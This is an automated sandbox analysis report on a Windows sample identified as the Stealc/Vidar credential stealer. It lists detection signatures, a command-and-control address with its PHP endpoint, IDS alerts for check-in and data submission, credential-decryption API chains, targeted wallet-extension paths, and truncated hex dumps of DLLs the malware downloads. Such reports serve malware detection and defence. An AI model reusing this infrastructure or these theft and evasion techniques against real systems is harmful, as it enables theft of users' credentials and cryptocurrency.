Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1501501
MD5: 9ee7d1fb0f1e8a7a998da096b4da22a9
SHA1: 11cf686cb71ea7fbde2c0448ddd1f12ab44a393e
SHA256: 7394adbf1fe4a07aa08d1e7d25c10b28994eb7eb8671b8ef767c349b5b44c37d
Tags: exe
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.100/ URL Reputation: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php URL Reputation: Label: malware
Source: http://185.215.113.100 URL Reputation: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpH; Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php=Iq Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phph Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpion: Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/msvcp140.dllK Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpBrowser Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpm Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpp Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpf Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/mozglue.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpndI Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/softokn3.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php: Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/nss3.dllc Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php( Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/freebl3.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/nss3.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/vcruntime140.dlll5 Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php0 Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/vcruntime140.dllN Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php$ Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php3 Avira URL Cloud: Label: malware
Source: 185.215.113.100/e2b1563c6670f193.php Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/msvcp140.dll) Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpLo Avira URL Cloud: Label: malware
Found malware configuration
Source: file.exe.5320.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "185.215.113.100/e2b1563c6670f193.php"}
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 36%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00189BB0 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00189BB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00198940 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_00198940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00187280 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00187280
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00189B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00189B10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0018C660 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 0_2_0018C660
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C686C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C686C80
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0018D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0018D8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001939B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_001939B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0018E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0018E270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001943F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_001943F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0018BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0018BCB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0018F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0018F4F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00181710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00181710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00194050 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00194050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0018EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0018EB60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001933C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_001933C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0018DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0018DC50
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.100:80 -> 192.168.2.5:49704
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.100:80 -> 192.168.2.5:49704
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.100:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 185.215.113.100/e2b1563c6670f193.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 22:48:01 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 22:48:08 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 22:48:09 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 22:48:09 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 